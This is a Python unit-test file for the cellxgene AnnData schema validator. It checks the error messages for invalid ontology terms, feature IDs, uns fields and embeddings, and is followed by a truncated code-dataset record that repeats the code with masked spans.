# human nor mouse, then two other columns that are dependent on it need to be set appropriately to avoid
# other error messages: "development_stage_ontology_term_id" and "ethnicity_ontology_term_id"
self.validator.adata.obs["organism_ontology_term_id"][0] = "EFO:0000001"
self.validator.adata.obs["development_stage_ontology_term_id"][0] = "unknown"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid "
"ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed."
],
)
def test_tissue_ontology_term_id_base(self):
"""
tissue_ontology_term_id categorical with str categories. This MUST be the term that best describes the tissue
that this cell was derived from, depending on the type of biological sample:
"""
self.validator.adata.obs["tissue_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a "
"valid ontology term id of 'UBERON, CL'."
],
)
def test_tissue_ontology_term_id_cell_culture(self):
"""
Cell Culture - MUST be a CL term appended with " (cell culture)"
"""
self.validator.adata.obs["tissue_ontology_term_id"][
0
] = "CL:0000057 (CELL culture)"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'CL:0000057 (CELL culture)' in 'tissue_ontology_term_id' is "
"not a valid ontology term id of 'UBERON, CL'."
],
)
def test_tissue_ontology_term_id_organoid(self):
"""
Organoid - MUST be an UBERON term appended with " (organoid)"
"""
self.validator.adata.obs["tissue_ontology_term_id"][0] = "CL:0000057 (ORGANOID)"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is "
"not a valid ontology term id of 'UBERON, CL'."
],
)
def test_sex_ontology_term_id(self):
"""
sex_ontology_term_id categorical with str categories.
This MUST be a child of PATOPATO:0001894 for phenotypic sex or "unknown" if unavailable
"""
self.validator.adata.obs["sex_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is "
"not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', "
"or 'unknown' are allowed."
],
)
def test_is_primary_data(self):
"""
is_primary_data bool. This MUST be True if this is the canonical instance of this cellular
observation and False if not. This is commonly False
for meta-analyses reusing data or for secondary views of data.
"""
self.validator.adata.obs["is_primary_data"] = "FALSE"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Column 'is_primary_data' in dataframe 'obs' "
"must be boolean, not 'object'."
],
)
class TestVar(unittest.TestCase):
"""
Fail cases in adata.var and adata.raw.var
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_var_and_raw_var_same_index(self):
"""
var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.
"""
# Swap first row for second one
var = Validator.getattr_anndata(self.validator.adata, "var")
# First swap the index
new_index = list(var.index)
tmp = new_index[0]
new_index[0] = new_index[1]
new_index[1] = tmp
var.set_index(pd.Index(new_index), inplace=True)
# Then swap the actual rows
tmp = var.iloc[0, :].copy()
var.iloc[0, :] = var.iloc[1, :].copy()
var.iloc[1, :] = tmp
self.validator.validate_adata()
print("FOO", self.validator.errors)
self.assertEqual(
self.validator.errors,
["ERROR: Index of 'raw.var' is not identical to index of 'var'."],
)
def test_check_unique_var(self):
"""
var.index MUST contain unique ENSEMBL gene identifiers for features.
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
# Duplicate 1st row in var and assign it to 2nd
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[1] = new_index[0]
component.set_index(pd.Index(new_index), inplace=True)
component.iloc[1, :] = component.iloc[0, :]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: Column 'index' in dataframe '{component_name}' is not unique."
],
)
def test_column_presence(self):
"""
var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.
feature_is_filtered must not be in raw.var, and it's only checked in var
"""
columns = ["feature_is_filtered", "feature_biotype"]
for component_name in ["var", "raw.var"]:
for column in columns:
if column == "feature_is_filtered" and component_name == "raw.var":
continue
with self.subTest(component_name=component_name, column=column):
# Resetting validator
self.validator.errors = []
self.validator.adata = examples.adata.copy()
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
component.drop(column, axis=1, inplace=True)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: Dataframe '{component_name}' is missing "
f"column '{column}'."
],
)
def test_feature_is_filtered(self):
"""
feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)
but is present in the raw matrix (raw.X). The value for all cells of the given feature in the
final matrix MUST be 0.
Otherwise, this MUST be False.
"""
# Duplicate 1st row in var and assigned to 2nd
self.validator.adata.var["feature_is_filtered"][0] = True
for i in range(self.validator.adata.X.shape[0]):
self.validator.adata.X[i, 0] = 0
self.validator.adata.X[0, 0] = 1
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', "
"but there are 1 non-zero values in the corresponding columns of the matrix 'X'. "
"All values for these features must be 0."
],
)
def test_columns_not_in_raw_var(self):
"""
Curators MUST annotate the following column only in the var dataframe.
This column MUST NOT be present in raw.var:
feature_is_filtered
"""
self.validator.adata.raw = self.validator.adata
self.validator.adata.uns["X_normalization"] = "CPM"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
["ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'."],
)
def test_feature_id_wrong_format(self):
"""
feature_id (var.index) str.
If the feature_biotype is "gene" then this MUST be an ENSEMBL term.
If the feature_biotype is "spike-in" then this MUST be an ERCC Spike-In identifier.
This tests the case of an ID with an incorrect format "ENSEBML_NOGENE"
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[0] = "ENSEBML_NOGENE"
component.set_index(pd.Index(new_index), inplace=True)
component["feature_biotype"][0] = "gene"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' "
f"in '{component_name}', make sure it is a valid ID."
],
)
def test_feature_id_non_existent_ensembl(self):
"""
feature_id (var.index) str.
If the feature_biotype is "gene" then this MUST be an ENSEMBL term.
If the feature_biotype is "spike-in" then this MUST be an ERCC Spike-In identifier.
This tests the case of an ENSEMBL ID that has the right format but doesn't exist
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[0] = "ENSG000"
component.set_index(pd.Index(new_index), inplace=True)
component["feature_biotype"][0] = "gene"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'."
],
)
def test_feature_id_non_existent_ercc(self):
"""
feature_id (var.index) str.
If the feature_biotype is "gene" then this MUST be an ENSEMBL term.
If the feature_biotype is "spike-in" then this MUST be an ERCC Spike-In identifier.
This tests the case of an ERCC ID that has the right format but doesn't exist
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[0] = "ERCC-000000"
component.set_index(pd.Index(new_index), inplace=True)
component["feature_biotype"][0] = "spike-in"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'."
],
)
class TestUns(unittest.TestCase):
"""
Fail cases in adata.uns
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_required_fields_schema_version(self):
"""
Curators MUST annotate `schema_version` and values in uns (schema_version)
"""
del self.validator.adata.uns["schema_version"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: adata has no schema definition in 'adata.uns'. "
"Validation cannot be performed."
],
)
def test_required_fields_title(self):
"""
Curators MUST annotate `schema_version` and values in uns (title)
"""
del self.validator.adata.uns["title"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors, ["ERROR: 'title' in 'uns' is not present."]
)
def test_required_fields_X_normalization(self):
"""
Curators MUST annotate `schema_version` and values in uns (X_normalization)
"""
del self.validator.adata.uns["X_normalization"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors, ["ERROR: 'X_normalization' in 'uns' is not present."]
)
def test_leading_trailing_double_spaces_in_strings(self):
"""
The following sequences MUST NOT appear in str types documented in the schema:
Leading control or space separators - ” This is an example”
Trailing control or space separators - “This is an example ”
Multiple (internal) control or space separators - "This is an example"
"""
self.validator.adata.uns["title"] = " There is a leading space"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces."
],
)
self.validator.adata.uns["title"] = "There is a trailing space "
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces."
],
)
self.validator.adata.uns["title"] = "There are double spaces"
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces."
],
)
def test_schema_version(self):
"""
Schema_version, This MUST be "2.0.0".
"""
self.validator.adata.uns["schema_version"] = "1.0.0"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. "
"Validation cannot be performed."
],
)
def test_title(self):
"""
Title MUST be a string
"""
# list instead of string
self.validator.adata.uns["title"] = ["title"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['title']' in 'uns['title']' is not valid, "
"it must be a string."
],
)
def test_X_normalization_is_str(self):
"""
X_normalization str.
"""
# list instead of string
self.validator.adata.uns["X_normalization"] = ["normalization"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['normalization']' in 'uns['X_normalization']' is "
"not valid, it must be a string."
],
)
def test_X_normalization_not_raw(self):
"""
X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.
If data in X are raw, this SHOULD be "none".
FAIL CASE for when X_normalization was set to "none" but X may not be raw data
"""
# Assign a real value to X while X_normalization is 'none'
del self.validator.adata.raw
self.validator.adata.uns["X_normalization"] = "none"
self.validator.validate_adata()
print("FOO", self.validator.warnings)
self.assertEqual(
self.validator.warnings,
[
"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear "
"to have raw counts (integers)"
],
)
def test_batch_condition_is_list(self):
"""
batch_condition list[str]
"""
# Check valid case of numpy array which is interchangeable with lists
self.validator.adata.uns["batch_condition"] = numpy.array(
self.validator.adata.uns["batch_condition"]
)
self.validator.validate_adata()
self.assertEqual(self.validator.errors, [])
# Check fail case: not a list nor numpy array
self.validator.adata.uns["batch_condition"] = "cell_type_ontology_term_id"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' "
"is not valid, it must be a list or numpy array."
],
)
def test_batch_condition_is_column_from_obs(self):
"""
batch_condition list[str]. str values MUST refer to cell metadata keys in obs.
"""
self.validator.adata.uns["batch_condition"] = ["NO_COLUMN"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a "
"column in 'adata.obs'."
],
)
def test_default_embedding_is_str(self):
"""
Default_embedding str.
"""
self.validator.adata.uns["default_embedding"] = ["X_umap"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, "
"it must be a string."
],
)
def test_default_embedding_is_key_from_obsm(self):
"""
Default_embedding str. The value MUST match a key to an embedding in obsm
"""
self.validator.adata.uns["default_embedding"] = "X_other"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, "
"it must be a key of 'adata.obsm'."
],
)
def test_X_approximate_distribution_is_str(self):
"""
X_approximate_distribution str. The value MUST be "count" [...] or "normal".
Note that `normal` is tested in the happy path test case using `good_uns`.
"""
# Check valid case of "count" which is not included in valid object
self.validator.adata.uns["X_approximate_distribution"] = "count"
self.validator.validate_adata()
self.assertEqual(self.validator.errors, [])
# Invalid type: list
self.validator.adata.uns["X_approximate_distribution"] = ["count"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['count']' in 'uns['X_approximate_distribution']' "
"is not valid, it must be a string."
],
)
def test_X_approximate_distribution_is_valid(self):
"""
X_approximate_distribution str. The value MUST be "count" [...] or "normal"
"""
self.validator.adata.uns["X_approximate_distribution"] = "COUNT"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is "
"not valid. Allowed terms: ['count', 'normal']."
],
)
class TestObsm(unittest.TestCase):
"""
Fail cases for adata.obsm
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_obsm_values_ara_numpy(self):
"""
values in obsm MUST be a numpy.ndarray
"""
self.validator.adata.obsm["X_tsne"] = pd.DataFrame(
self.validator.adata.obsm["X_umap"], index=self.validator.adata.obs_names
)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: All embeddings have to be of 'numpy.ndarray' type, "
"'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>')."
],
)
def test_obsm_values_at_least_one_X(self):
"""
At least one key for the embedding MUST be prefixed with "X_"
"""
self.validator.adata.obsm["umap"] = self.validator.adata.obsm["X_umap"]
self.validator.adata.uns["default_embedding"] = "umap"
del self.validator.adata.obsm["X_umap"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: At least one embedding in 'obsm' has to have a "
"key with an 'X_' prefix."
],
)
def test_obsm_shape(self):
"""
Curators MUST annotate one or more two-dimensional (m >= 2) embeddings
"""
# Makes 1 column array
self.validator.adata.obsm["X_umap"] = numpy.delete(
self.validator.adata.obsm["X_umap"], 0, 1
)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: All embeddings must have as many rows as cells, and "
"at least two columns.'adata.obsm['X_umap']' has shape "
"of '(2, 1)'."
],
)
class TestAddingLabels(unittest.TestCase):
"""
Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually
created dataframes (positive control) against the ones produced by the validator
"""
@classmethod
def setUpClass(cls):
# Manually created data (positive control)
cls.adata_with_labels = examples.adata_with_labels
# Validate test data
validator = Validator()
validator.adata = examples.adata.copy()
validator.validate_adata()
# Add labels through validator
cls.label_writer = AnnDataLabelAppender(validator)
cls.label_writer._add_labels()
def test_var_added_labels(self):
"""
When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable
name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism
to the var dataframe. Curators MUST NOT annotate the following columns:
- feature_name. If the feature_biotype is "gene" then this MUST be the human-readable ENSEMBL gene
name assigned to the feature_id. If the feature_biotype is "spike-in" then this MUST be the
ERCC Spike-In identifier appended with " spike-in control".
- feature_reference. This MUST be the reference organism for a feature:
Homo sapiens "NCBITaxon:9606"
Mus musculus "NCBITaxon:10090"
SARS-CoV-2 "NCBITaxon:2697049"
ERCC Spike-Ins "NCBITaxon:32630"
"""
for column in ["feature_name", "feature_reference"]:
expected_column = self.adata_with_labels.var[column]
obtained_column = self.label_writer.adata.var[column]
for i, j in zip(expected_column.tolist(), obtained_column.tolist()):
with self.subTest(i=i, j=j):
self.assertEqual(i, j)
def test_obs_added_labels(self):
"""
When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable
name for the corresponding ontology term to the obs dataframe.
Curators MUST NOT annotate the following columns.
- assay. categorical with str categories. This MUST be the human-readable name assigned to the value
of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to
assay_ontology_term_id MUST be appended to assay.
- cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value
of cell_type_ontology_term_id.
- development_stage. categorical with str categories. This MUST be "unknown" if set in
development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to
the value of development_stage_ontology_term_id.
- disease. categorical with str categories. This MUST be the human-readable name assigned to
the value of disease_ontology_term_id.
- ethnicity. categorical with str categories. This MUST be "na" or "unknown" if
set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable
name assigned to the value of ethnicity_ontology_term_id.
- organism. categorical with str categories. This MUST be the human-readable name assigned
to the value of organism_ontology_term_id.
- sex. categorical with str categories. This MUST be "unknown" if set in sex_ontology_term_id;
otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.
- tissue. categorical with str categories. This MUST be the human-readable name assigned to the
value of tissue_ontology_term_id. " (cell culture)" or " (organoid)" MUST
be appended if present in tissue_ontology_term_id.
"""
for column in [
"assay",
"cell_type",
"development_stage",
"disease",
"ethnicity",
"organism",
"sex",
"tissue",
]:
expected_column = self.adata_with_labels.obs[column]
obtained_column = self.label_writer.adata.obs[column]
for i, j in zip(expected_column.tolist(), obtained_column.tolist()):
with self.subTest(i=i, j=j):
self.assertEqual(i, j)
|
normal
|
{
"blob_id": "f4306f80330850415b74d729384f360489644e39",
"index": 354,
"step-1": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n <mask token>\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n 